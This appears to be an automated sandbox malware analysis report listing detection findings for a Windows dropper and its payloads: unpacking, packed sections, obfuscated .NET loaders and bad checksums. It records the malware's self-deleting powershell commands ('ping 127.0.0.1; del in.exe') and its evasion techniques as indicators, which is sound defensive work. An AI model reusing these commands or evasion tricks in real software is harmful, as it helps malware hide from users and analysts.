Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.660000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;syfpipoa:EW;kqlprvhw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Unpacked PE file: 5.2.0d47c4c34f.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 8.2.axplong.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldrpiuby:EW;cguvigub:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Unpacked PE file: 48.2.Bxq1jd2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.00cfg:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe

Unpacked PE file: 48.2.Bxq1jd2.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs	.Net Code: Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777430)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777322)),Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777257))})
Source: EkmIhQM.exe.4.dr, mEqmoE9UxRmX9ogcto.cs	.Net Code: Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777430)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777322)),Type.GetTypeFromHandle(CfGIXtTdcZLAtxDM4Z.tC9SqlGgKyYln(16777257))})

.NET source code contains potential unpacker

Source: EkmIhQM[1].exe.4.dr, hrwN54ssk66JhR0d65a.cs	.Net Code: tsFkXCLB65 System.Reflection.Assembly.Load(byte[])
Source: EkmIhQM.exe.4.dr, hrwN54ssk66JhR0d65a.cs	.Net Code: tsFkXCLB65 System.Reflection.Assembly.Load(byte[])
Source: wOKhy9f[1].exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs	.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
Source: wOKhy9f[1].exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs	.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
Source: wOKhy9f.exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs	.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])
Source: wOKhy9f.exe.4.dr, cc32ca733284270d3b4df2fe8ab07b58f.cs	.Net Code: cb893a2160a53e17b5b01b351d1e52b7e System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

Source: EkmIhQM[1].exe.4.dr

Static PE information: 0xE6542668 [Sat Jun 14 09:35:36 2092 UTC]

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B966A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,

12_2_00B966A8

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: wOKhy9f[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xe493
Source: K6UAlAU[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x5ab50
Source: f11f18202b.exe.4.dr	Static PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
Source: ZiYbk6W[1].exe.4.dr	Static PE information: real checksum: 0x1b27fd should be: 0x1b7bb1
Source: random[1].exe0.4.dr	Static PE information: real checksum: 0x2df901 should be: 0x2e05e2
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2e792f should be: 0x2f001c
Source: in.exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: 5102d46fb9.exe.4.dr	Static PE information: real checksum: 0x2a3521 should be: 0x2a5899
Source: random[1].exe1.4.dr	Static PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
Source: 7z.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: AzVRM7c[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 94CwbGg[1].exe.4.dr	Static PE information: real checksum: 0x54d1c1 should be: 0x56040e
Source: random[2].exe1.4.dr	Static PE information: real checksum: 0x2a3521 should be: 0x2a5899
Source: axplong.exe.5.dr	Static PE information: real checksum: 0x2df901 should be: 0x2e05e2
Source: 0d47c4c34f.exe.4.dr	Static PE information: real checksum: 0x2df901 should be: 0x2e05e2
Source: file.exe	Static PE information: real checksum: 0x2e792f should be: 0x2f001c
Source: ZiYbk6W.exe.4.dr	Static PE information: real checksum: 0x1b27fd should be: 0x1b7bb1
Source: random[2].exe.4.dr	Static PE information: real checksum: 0x1cd2c6 should be: 0x1cd408
Source: 7z.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: a4bd6a9bcb.exe.4.dr	Static PE information: real checksum: 0x1a9501 should be: 0x1a9c25
Source: dwVrTdy.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: K6UAlAU.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x5ab50
Source: t5abhIx.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 94CwbGg.exe.4.dr	Static PE information: real checksum: 0x54d1c1 should be: 0x56040e
Source: wOKhy9f.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xe493
Source: H9TU4oY[1].exe.4.dr	Static PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
Source: t5abhIx[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 3a4323f24d.exe.4.dr	Static PE information: real checksum: 0x1cd2c6 should be: 0x1cd408
Source: dwVrTdy[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: AzVRM7c.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: H9TU4oY.exe.4.dr	Static PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: syfpipoa
Source: file.exe	Static PE information: section name: kqlprvhw
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: syfpipoa
Source: skotes.exe.0.dr	Static PE information: section name: kqlprvhw
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe0.4.dr	Static PE information: section name:
Source: random[1].exe0.4.dr	Static PE information: section name: .idata
Source: random[1].exe0.4.dr	Static PE information: section name: ldrpiuby
Source: random[1].exe0.4.dr	Static PE information: section name: cguvigub
Source: random[1].exe0.4.dr	Static PE information: section name: .taggant
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name:
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name: .idata
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name: ldrpiuby
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name: cguvigub
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name: .taggant
Source: K6UAlAU[1].exe.4.dr	Static PE information: section name: .x64
Source: K6UAlAU.exe.4.dr	Static PE information: section name: .x64
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name:
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: .idata
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name:
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: ubvmxkob
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: xdawalmh
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: .taggant
Source: H9TU4oY.exe.4.dr	Static PE information: section name:
Source: H9TU4oY.exe.4.dr	Static PE information: section name: .idata
Source: H9TU4oY.exe.4.dr	Static PE information: section name:
Source: H9TU4oY.exe.4.dr	Static PE information: section name: ubvmxkob
Source: H9TU4oY.exe.4.dr	Static PE information: section name: xdawalmh
Source: H9TU4oY.exe.4.dr	Static PE information: section name: .taggant
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: .idata
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: frbjvewh
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: odinhcyc
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: .taggant
Source: ZiYbk6W.exe.4.dr	Static PE information: section name:
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: .idata
Source: ZiYbk6W.exe.4.dr	Static PE information: section name:
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: frbjvewh
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: odinhcyc
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: .taggant
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: ubvmxkob
Source: random[1].exe1.4.dr	Static PE information: section name: xdawalmh
Source: random[1].exe1.4.dr	Static PE information: section name: .taggant
Source: LoaderClient[1].exe.4.dr	Static PE information: section name: _RDATA
Source: LoaderClient.exe.4.dr	Static PE information: section name: _RDATA
Source: f11f18202b.exe.4.dr	Static PE information: section name:
Source: f11f18202b.exe.4.dr	Static PE information: section name: .idata
Source: f11f18202b.exe.4.dr	Static PE information: section name:
Source: f11f18202b.exe.4.dr	Static PE information: section name: ubvmxkob
Source: f11f18202b.exe.4.dr	Static PE information: section name: xdawalmh
Source: f11f18202b.exe.4.dr	Static PE information: section name: .taggant
Source: random[2].exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name: .idata
Source: random[2].exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name: jaliwopm
Source: random[2].exe.4.dr	Static PE information: section name: chtmvbnb
Source: random[2].exe.4.dr	Static PE information: section name: .taggant
Source: 3a4323f24d.exe.4.dr	Static PE information: section name:
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: .idata
Source: 3a4323f24d.exe.4.dr	Static PE information: section name:
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: jaliwopm
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: chtmvbnb
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: .taggant
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name:
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name: .idata
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name:
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name: asolipax
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name: akodwsqo
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name: .taggant
Source: random[2].exe1.4.dr	Static PE information: section name:
Source: random[2].exe1.4.dr	Static PE information: section name: .idata
Source: random[2].exe1.4.dr	Static PE information: section name: eacxpgzo
Source: random[2].exe1.4.dr	Static PE information: section name: bagugiyz
Source: random[2].exe1.4.dr	Static PE information: section name: .taggant
Source: 5102d46fb9.exe.4.dr	Static PE information: section name:
Source: 5102d46fb9.exe.4.dr	Static PE information: section name: .idata
Source: 5102d46fb9.exe.4.dr	Static PE information: section name: eacxpgzo
Source: 5102d46fb9.exe.4.dr	Static PE information: section name: bagugiyz
Source: 5102d46fb9.exe.4.dr	Static PE information: section name: .taggant
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name: ldrpiuby
Source: axplong.exe.5.dr	Static PE information: section name: cguvigub
Source: axplong.exe.5.dr	Static PE information: section name: .taggant
Source: in.exe.22.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067D91C push ecx; ret	0_2_0067D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00671359 push es; ret	0_2_0067135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009DD91C push ecx; ret	2_2_009DD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009DD91C push ecx; ret	3_2_009DD92F
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000CD84C push ecx; ret	5_2_000CD85F
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000C122F pushad ; ret	5_2_000C1230
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Code function: 5_2_000C0B3B push esp; retf 0000h	5_2_000C0B3C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0064D84C push ecx; ret	6_2_0064D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 8_2_0064D84C push ecx; ret	8_2_0064D85F
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B7676A push rcx; ret	12_2_00B7676B

Source: file.exe	Static PE information: section name: entropy: 7.986233657501117
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.986233657501117
Source: random[1].exe0.4.dr	Static PE information: section name: entropy: 7.971213114861191
Source: 0d47c4c34f.exe.4.dr	Static PE information: section name: entropy: 7.971213114861191
Source: Bxq1jd2[1].exe.4.dr	Static PE information: section name: .text entropy: 7.203655785812803
Source: Bxq1jd2.exe.4.dr	Static PE information: section name: .text entropy: 7.203655785812803
Source: EkmIhQM[1].exe.4.dr	Static PE information: section name: .text entropy: 7.764107996728332
Source: EkmIhQM.exe.4.dr	Static PE information: section name: .text entropy: 7.764107996728332
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: entropy: 7.985148780171564
Source: H9TU4oY[1].exe.4.dr	Static PE information: section name: ubvmxkob entropy: 7.95406419852494
Source: H9TU4oY.exe.4.dr	Static PE information: section name: entropy: 7.985148780171564
Source: H9TU4oY.exe.4.dr	Static PE information: section name: ubvmxkob entropy: 7.95406419852494
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: entropy: 7.969631754503492
Source: ZiYbk6W[1].exe.4.dr	Static PE information: section name: frbjvewh entropy: 7.952884214471302
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: entropy: 7.969631754503492
Source: ZiYbk6W.exe.4.dr	Static PE information: section name: frbjvewh entropy: 7.952884214471302
Source: random[1].exe1.4.dr	Static PE information: section name: entropy: 7.985148780171564
Source: random[1].exe1.4.dr	Static PE information: section name: ubvmxkob entropy: 7.95406419852494
Source: f11f18202b.exe.4.dr	Static PE information: section name: entropy: 7.985148780171564
Source: f11f18202b.exe.4.dr	Static PE information: section name: ubvmxkob entropy: 7.95406419852494
Source: random[2].exe.4.dr	Static PE information: section name: entropy: 7.98575532392403
Source: random[2].exe.4.dr	Static PE information: section name: jaliwopm entropy: 7.954155060928768
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: entropy: 7.98575532392403
Source: 3a4323f24d.exe.4.dr	Static PE information: section name: jaliwopm entropy: 7.954155060928768
Source: a4bd6a9bcb.exe.4.dr	Static PE information: section name: asolipax entropy: 7.953155373076256
Source: random[2].exe1.4.dr	Static PE information: section name: entropy: 7.776371775944125
Source: 5102d46fb9.exe.4.dr	Static PE information: section name: entropy: 7.776371775944125
Source: axplong.exe.5.dr	Static PE information: section name: entropy: 7.971213114861191

Source: EkmIhQM[1].exe.4.dr, UserControlAuth.cs	High entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'UUg8DmXXLZLOa72s7G', 'HQHXycUecMeFLqNjcw', 'vdgj2NOotXmGReC3ag', 'HeUqsUZPHVVXjA7dWs', 'n9UurTBEWlJ5xugavv', 'iYCXPgeooHJFKuRSfj', 'n0sZccxh1H3Zwdqls7', 'fKrnHI2hOu4JHXK1re'
Source: EkmIhQM[1].exe.4.dr, xRXfN.cs	High entropy of concatenated method names: 'Main', 'TFGFGriaaaa5aaa6ap78DS9DSFlesdsds', 'QozeXwardnBaTanya', 'tFJD9gNgXNq2UZCYVC', 'oelT7ooeWj1JYRk0A9', 'wdPCYEhRRiHSS8svkU', 'RHQULyH6bxvF3UgEWt', 'xR9GnqEtaKdkijRmbF', 'i3LR3ZkWPggiRIoVvN', 'Jd9Ita44fEekJmoGV6'
Source: EkmIhQM[1].exe.4.dr, RazorEditorParser.cs	High entropy of concatenated method names: 'CreateAndStart', 'Dispose', 'nHjJSAMQ1igmmtr5D2q', 'h7BZdPM3QX0Ufrp3RaR', 'lMrHnoMm8aNM0A7VWOx', 'CYrRX5M5ZaME6JqDl7s', 'xODsEeMgJLaaFFf6orw', 'GetAutoCompleteString', 'CheckForStructureChanges', 'VerifyFlagsAreValid'
Source: EkmIhQM[1].exe.4.dr, TextBufferReader.cs	High entropy of concatenated method names: 'bKE3QSa12kExNb1VcAh', 'JRIjYYasnO81D9pqwfX', 'Peek', 'Read', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'Rp9XGGaOA3mug3Hg3Wu', 'RF7CV3aZuI15KfbLAm5'
Source: EkmIhQM[1].exe.4.dr, TextChange.cs	High entropy of concatenated method names: 'Equals', 'ApplyChange', 'ApplyChange', 'GetHashCode', 'ToString', 'Normalize', 'GetText', 'YS5M9sA4cphMOkPtYEA', 'MWImYsAd87dbxtgFaWE', 'I5XrQYAcEMBR9osUPWV'
Source: EkmIhQM[1].exe.4.dr, BufferingTextReader.cs	High entropy of concatenated method names: 'TXtC1vitZlbjhQeYar2', 'dU3N1fiL851SfFidsvc', 'Read', 'Peek', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'NextCharacter', 'ExpandBuffer'
Source: EkmIhQM[1].exe.4.dr, GeneratedCodeMapping.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'k0PwsDMeyNZTZrSdiJC', 'o8K7RKMx1u5yQ2HfaZ5', 'uGHIIIM2rjxHGpJq7Q7', 'LSjPncMtlQ4JnoWMgeh', 'tFNiwnML2jdVi0eg66q', 'L7ob92M1WDxrqNUpClN'
Source: EkmIhQM[1].exe.4.dr, VBRazorCodeGenerator.cs	High entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'VisitSpan', 'VisitSpan', 'sLxMjNALAI2RlRi0olh', 'dkW8pdA1TK9cRLeteZt', 'Y5tXI8AsTfUh0KgSoBW', 'qJplEpAwSkGCvLbyegV', 'mUhrm9AfWxhBJQiLEGN', 'Ym3nYEAuEOEetj2DyGe'
Source: EkmIhQM[1].exe.4.dr, CSharpRazorCodeGenerator.cs	High entropy of concatenated method names: 'CreateCodeWriter', 'WriteHelperVariable', 'yG1QaADj7wvODb4R9Ik', 'd6tM4oD0ALikI0mBP1P', 'PxiMEIDIAh2HAaxnBpo', 'HHsAW5DRdLg5k7MCAvO', 'Y9HGhrD8BZm7MS16QWT', 'sjbUU7Dvx64aDrCrRvI', 'MW2uJODrT91fvpeRiGN', 'evonwuDNHg5qXDBZDDo'
Source: EkmIhQM[1].exe.4.dr, RazorCodeGenerator.cs	High entropy of concatenated method names: 'ynePkGbbNEJSgWIvwf7', 'of7fdpbDCbvdXPU4ysL', 'VisitSpan', 'MarkStartGeneratedCode', 'MarkEndGeneratedCode', 'ResetBuffer', 'IsContentSpan', 'gfNap7bay30SZRE07xu', 'WolnGVbYWX7WcIBj6Fw', 'EyPTrObAcKGIyPGp2LL'
Source: EkmIhQM[1].exe.4.dr, mEqmoE9UxRmX9ogcto.cs	High entropy of concatenated method names: 'Q5MkM5QYd3', 'qDhjp4lmAjYcpcwFN1v', 'HBBFPFl5dykXMmDGX1N', 'SF0FMLlgCdI8XwcjsEo', 'Gdr5FIlJcSjrgL6GUlc', 'fHSkdAnkJf', 'k96k7mkjK6', 't26kG3LxyN', 'WBQk3NCaKd', 'AgYkLp4qOr'
Source: EkmIhQM[1].exe.4.dr, ParserContext.cs	High entropy of concatenated method names: 'GUeVUnaGvdQ7Eoj5vYg', 'IPru3mayWROE934fN9y', 'StartTemporaryBuffer', 'AcceptTemporaryBuffer', 'AcceptCurrent', 'Append', 'OutputSpan', 'ResumeSpan', 'StartBlock', 'PushVisitor'
Source: EkmIhQM[1].exe.4.dr, ParserBase.cs	High entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'IsAtTransition', 'NextIsTransition', 'ParseBlock', 'StartBlock', 'StartBlock', 'EndBlock', 'Output', 'OnError'
Source: EkmIhQM[1].exe.4.dr, HtmlMarkupParser.cs	High entropy of concatenated method names: 'sUVFd9A03p1SINum7Og', 'BmdB6aAILou36sw1IDJ', 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseSection', 'ParseDocument', 'ParseRootBlock', 'ParseBlock', 'IsStartTag', 'IsEndTag'
Source: EkmIhQM[1].exe.4.dr, VBCodeParser.cs	High entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'ParseBlock', 'TryAcceptStringOrComment', 'HandleTransition', 'HandleTransitionCore', 'HandleReservedWord', 'ParseHelperBlock', 'ParseImplicitBlock', 'ParseSectionStatement'
Source: EkmIhQM[1].exe.4.dr, CSharpCodeParser.cs	High entropy of concatenated method names: 'IsAtExplicitTransition', 'IsAtImplicitTransition', 'TryRecover', 'ParseBlock', 'WrapSimpleBlockParser', 'HandleReservedWord', 'ParseInheritsStatement', 'ParseImplicitExpression', 'ParseImplicitExpression', 'ParseStatement'
Source: EkmIhQM[1].exe.4.dr, hrwN54ssk66JhR0d65a.cs	High entropy of concatenated method names: 'lLHifFIsCLsZtjvFfN0i', 'tsFkXCLB65', 'V2hk1qXaN6', 'iLd0d8WDP379kn9xhYl', 'HbuRd6WiEhZDXVplODc', 'YtFiFSWajlbN7lh75cO', 'xpQHYeWYVNv0F7qe2by', 'q1U0gcWALoo0nnYdTya', 'bPLigaWKwlSJZjPYq6A', 'uSI0PxWliFqjPtWleMu'
Source: EkmIhQM[1].exe.4.dr, VBOptionSpan.cs	High entropy of concatenated method names: 'Create', 'Equals', 'ToString', 'GetHashCode', 'fMpXkZCBAIh8evjsXOD', 'sc3MAMCecxSxotGHmBr', 'nSL9faCx8D8WGw0LJew', 'pZcyY1C2qBiFlTZI976', 'Q7vwxNCtNGqofUgifiE'
Source: EkmIhQM[1].exe.4.dr, Span.cs	High entropy of concatenated method names: 'Accept', 'ApplyChange', 'ApplyChange', 'CanAcceptChange', 'UpdateContent', 'OwnsChange', 'ToString', 'Equals', 'GetHashCode', 'TryMergeWith'
Source: EkmIhQM[1].exe.4.dr, NamespaceImportSpan.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'ToString', 'Create', 'hR8Tx3MALfcsYx5xHWL', 'B9CXJPMKLD0BKkeoGbd', 'fNOSr8MlJYZ2ywSoGbE', 'JGvNxdMWcpHKOMj00rj', 'dogBTaMGVp7jsdRiIEU', 'Ph4hPIMyFhLmGoeDpc9'
Source: EkmIhQM.exe.4.dr, UserControlAuth.cs	High entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'UUg8DmXXLZLOa72s7G', 'HQHXycUecMeFLqNjcw', 'vdgj2NOotXmGReC3ag', 'HeUqsUZPHVVXjA7dWs', 'n9UurTBEWlJ5xugavv', 'iYCXPgeooHJFKuRSfj', 'n0sZccxh1H3Zwdqls7', 'fKrnHI2hOu4JHXK1re'
Source: EkmIhQM.exe.4.dr, xRXfN.cs	High entropy of concatenated method names: 'Main', 'TFGFGriaaaa5aaa6ap78DS9DSFlesdsds', 'QozeXwardnBaTanya', 'tFJD9gNgXNq2UZCYVC', 'oelT7ooeWj1JYRk0A9', 'wdPCYEhRRiHSS8svkU', 'RHQULyH6bxvF3UgEWt', 'xR9GnqEtaKdkijRmbF', 'i3LR3ZkWPggiRIoVvN', 'Jd9Ita44fEekJmoGV6'
Source: EkmIhQM.exe.4.dr, RazorEditorParser.cs	High entropy of concatenated method names: 'CreateAndStart', 'Dispose', 'nHjJSAMQ1igmmtr5D2q', 'h7BZdPM3QX0Ufrp3RaR', 'lMrHnoMm8aNM0A7VWOx', 'CYrRX5M5ZaME6JqDl7s', 'xODsEeMgJLaaFFf6orw', 'GetAutoCompleteString', 'CheckForStructureChanges', 'VerifyFlagsAreValid'
Source: EkmIhQM.exe.4.dr, TextBufferReader.cs	High entropy of concatenated method names: 'bKE3QSa12kExNb1VcAh', 'JRIjYYasnO81D9pqwfX', 'Peek', 'Read', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'Rp9XGGaOA3mug3Hg3Wu', 'RF7CV3aZuI15KfbLAm5'
Source: EkmIhQM.exe.4.dr, TextChange.cs	High entropy of concatenated method names: 'Equals', 'ApplyChange', 'ApplyChange', 'GetHashCode', 'ToString', 'Normalize', 'GetText', 'YS5M9sA4cphMOkPtYEA', 'MWImYsAd87dbxtgFaWE', 'I5XrQYAcEMBR9osUPWV'
Source: EkmIhQM.exe.4.dr, BufferingTextReader.cs	High entropy of concatenated method names: 'TXtC1vitZlbjhQeYar2', 'dU3N1fiL851SfFidsvc', 'Read', 'Peek', 'Dispose', 'BeginLookahead', 'CancelBacktrack', 'EndLookahead', 'NextCharacter', 'ExpandBuffer'
Source: EkmIhQM.exe.4.dr, GeneratedCodeMapping.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'k0PwsDMeyNZTZrSdiJC', 'o8K7RKMx1u5yQ2HfaZ5', 'uGHIIIM2rjxHGpJq7Q7', 'LSjPncMtlQ4JnoWMgeh', 'tFNiwnML2jdVi0eg66q', 'L7ob92M1WDxrqNUpClN'
